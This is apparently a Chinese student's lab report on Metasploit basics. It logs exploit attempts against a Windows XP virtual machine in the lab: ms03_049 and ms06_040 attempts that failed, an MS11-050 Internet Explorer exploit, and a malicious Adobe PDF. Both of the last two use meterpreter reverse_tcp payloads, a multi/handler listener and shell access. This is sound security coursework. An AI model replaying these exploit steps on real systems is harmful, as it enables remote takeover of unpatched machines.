20145337《网络对抗技术》MSF基础应用

20145337《网络对抗技术》MSF基础应用

一、实验后回答问题

什么是exploit、payload、encode

  • Metasploit这种模块化的设计,大大提高了代码的复用率。exploit(渗透攻击模块)利用漏洞或者配置弱点对目标进行攻击,payload(攻击载荷模块)作为一种手段,exploit通过填入和运行攻击载荷,获得远程的访问权限。encode(编码器模块)是工具之一,也是渗透攻击的一重保障——避免坏字符、使攻击载荷免杀。这3个模块是渗透攻击的核心,相辅相成。

二、实验总结与体会

  • 通过这次实验,我学会了修改kali的IP,然后就能ping通了

  • 为了和别的同学做不同的主动攻击,下载了4、5个虚拟机,通过这次实验,我学会了在虚拟机中装XP系统。实验的成功与否,有很多不确定的因素,比如中英文版本啊,可能我下载的虚拟机事先打好了补丁啊(虽然它写着原始版和纯净版)
  • 这次实验很有意思,系统漏洞不容小觑,稍加利用就能变成渗透攻击的手段。对渗透攻击有了更深入的了解,最后要立一个FLAG,改掉拖延症

三、实验过程记录

ms03_049、ms06_040主动攻击

  • 大家都做ms08_067,想找一个和大家不一样的.查了一下WinXPSP3,除了这个漏洞,其他漏洞像拒绝服务漏洞、任意写入权限提升漏洞太难操作了。

  • 尝试了ms03_049、ms_06_040(本来想做killbill,因为电影挺好看,然鹅并没有符合条件的靶机)
  • 这里的靶机是Win XP Professional原版
  1. 输入msfconsole进入msf,search一下

  1. 进入该漏洞模块的使用(use exploit/windows/smb/ms03_049_netapi)

  2. show payload,找到一个比如shell_reverse_tcp;show targets

  1. 设置攻击有效载荷(set payload generic/shell_reverse_tcp)、show options并设置相关数据

  1. 输入exploit开始攻击

  • 建立不了联接?关闭防火墙试试?还是不行

  • 又试了ms06_040
  • 真的做了挺多回,本来以为召唤盾牌就能成功的,看到坦克依然不成功,就发现自己想的太简单

  • 也没成功,希望老师不要扣分,我毕竟和大家的主动攻击不一样呀(O_O),连不通我也很绝望

IE浏览器渗透攻击——MS11050安全漏洞

  1. 开启msfconsole,输入use exploit/windows/browser/ms11_050_mshtml_cobjetelement
  2. 输入info查看信息:

  1. 设置对应的载荷set payload windows/meterpreter/reverese_tcp;

  2. show options查看需要设置的相关信息:

  3. 设置相关信息:set LHOST ‘kali Ip’、 set LPORT 5337、 set URIPATH baidu

  1. exploit,有靶机需要访问的ip地址:
  2. 在靶机IE上输入网址,并在靶机上查看信息。

  1. 可以看见kali中显示一个session 1已经创建;
  2. 输入命令sessions -i 1,开始连接,输入shell成功获取shell

Adobe阅读器渗透攻击

  1. 开启msfconsole、输入命令use exploit/windows/fileformat/adobe_cooltype_sing

  2. 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,show options

  1. 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

  1. 使用use exploit/multi/handler新建一个监听模块

  1. 使用set payload 建立一个反向连接,设置set LPORT 5337

  1. 使用命令exploit开始攻击,在xp中打开pdf。同时kali会显示连接成功的结果。
  2. 输入shell获取靶机信息

  1. 在靶机xp中使用命令netstat -an,看本地tcp连接

辅助模块

  • 本来尝试了书上的“开放代理探测与应用”,但是run不起来

  • 枚举系统上的用户

原文地址:https://www.cnblogs.com/5337my/p/6724979.html